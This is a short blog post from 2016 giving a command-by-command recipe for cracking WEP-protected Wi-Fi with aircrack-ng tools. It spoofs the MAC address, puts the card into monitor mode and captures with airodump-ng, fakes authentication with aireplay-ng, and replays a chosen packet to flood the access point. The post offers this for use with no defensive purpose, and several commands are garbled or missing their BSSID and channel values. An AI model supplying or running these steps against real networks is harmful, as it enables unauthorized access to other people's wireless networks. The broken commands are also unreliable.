Thursday, 1 December 2016

Capturing Slow Wep Packets


Shell number 1 :  ifconfig wlan0 down macchanger -m 00:11:22:33:44:55 wlan0 ifconfig wlan0 up airmon-ng start wlan0 airodump-ng -c -b -w wlan0   


Shell number 2 : aireplay-ng -1 0 -a wlan0 aireplay-ng -1 0 -a mon0   

Shell number 3 : aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -a -x 200 mon0  aireplay will start reading packets for -p 0841 attack and it will ask you wold you like to use this packet (y/n) : Don't enter anything , leave it like that , 


then go back to shell number 2 , and do : aireplay-ng -1 0 -a mon0 aireplay-ng -1 6666 -a wlan0 

  then go back to shell number 3 and enter y :)  I supose that you are not a begginer in WIFI but anyway : wlan0 - managed interface mon0 - monitor interface Change interfaces to those that you have. -c -- channel of AP -w -- output file -a -- BSSID of AP [ MAC address ] -b -- same as -a -x -- number of packets , can change it as you like , for me 200 is optimal :)  So try it

No comments:

Post a Comment